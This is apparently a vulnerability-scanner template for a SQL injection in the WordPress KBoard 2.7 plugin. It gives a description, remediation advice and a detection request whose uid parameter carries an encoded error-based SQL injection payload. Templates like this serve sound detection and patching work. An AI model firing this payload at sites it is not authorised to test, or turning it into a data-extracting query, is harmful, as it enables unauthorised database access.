id: Wordpress-KBoard_Plugins-SQLi
info:
  name: WordPress_KBoard_2.7_board.php_SQL injection vulnerability
  author:
  - l0ne1y
  description: |-
    WordPress Plugin KBoard board.php SQL Injection Vulnerability
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an open source application plug-in for WordPress.

    There is an input validation error vulnerability in WordPress KBoard version 2.7/wp-content/plugins/kboard/board.php, which causes a SQL injection vulnerability in the uid parameter.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/

    Temporary fix:
    1. Use precompiled statements. When using PDO, be careful not to splice variables directly into PDO statements. All query statements use the parameterized query interface provided by the database. Parameterized statements use parameters instead of embedding user input variables into the SQL statement. Almost all current database systems provide parameterized SQL statement execution interfaces. Using this interface can very effectively prevent SQL injection attacks.
    2. Escape or code the special characters (’”<>&*;, etc.) that enter the database.
    3. Confirm the type of each data. For example, numeric data must be numbers, and the storage fields in the database must correspond to int types.
    4. The data length should be strictly specified, which can prevent relatively long SQL injection statements from being executed correctly to a certain extent.
    5. The encoding of each data layer of the website is unified. It is recommended to use UTF-8 encoding for all data. Inconsistent encoding of the upper and lower layers may cause some filtering models to be bypassed.
    6. Strictly limit the database operation permissions of website users, and provide this user with permissions that are only sufficient for his or her work, thereby minimizing the harm of injection attacks to the database.
    7. Prevent the website from displaying SQL error messages, such as type errors, field mismatches, etc., to prevent attackers from using these error messages to make some judgments.
    8. Filter dangerous characters, for example: use regular expressions to match keywords such as union, sleep, and, select, load_file, etc. If a match is found, the operation will be terminated.
requests:
- matchers:
  - type: status
    status:
    - 200
  - type: word
    words:
    - c4ca4238a0b923820dcc509a6f75849b
  matchers-condition: and
  path:
  - '{{BaseURL}}/wp-content/plugins/kboard/board.php?pageid=1&board_id=1&mod=document&uid=1%20OR%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT((SELECT%20MID((IFNULL(CAST(md5(1)%20AS%20CHAR),0x20)),1,451)),0x78))s),%208446744073709551610,%208446744073709551610)))'
  method: GET
